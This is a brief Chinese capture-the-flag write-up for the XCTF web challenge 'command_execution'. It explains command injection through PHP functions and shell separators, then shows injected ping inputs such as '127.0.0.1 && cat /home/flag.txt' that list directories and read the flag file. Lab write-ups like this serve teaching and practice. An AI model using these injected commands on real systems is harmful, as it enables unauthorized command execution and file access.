打开题目

xctf web之 command_execution
源代码也没东西
题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞

先介绍一下 命令执行漏洞

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

常见连接符
;A;B 先执行A,再执行B
& A&B 简单拼接,A B之间无制约关系
| A|B 显示B的执行结果
&& A&&B A执行成功,然后才会执行B
|| A||B A执行失败,然后才会执行B
xctf web之 command_execution
先 ping 127.0.0.1&&ls
发现没有可用的线索
xctf web之 command_execution
ping 127.0.0.1&& ls . . / . . / . . /
发现

xctf web之 command_execution

查看home 目录
发现
xctf web之 command_execution
直接
ping 127.0.0.1 && cat /home/flag.txt
得到flag

xctf web之 command_execution

相关文章: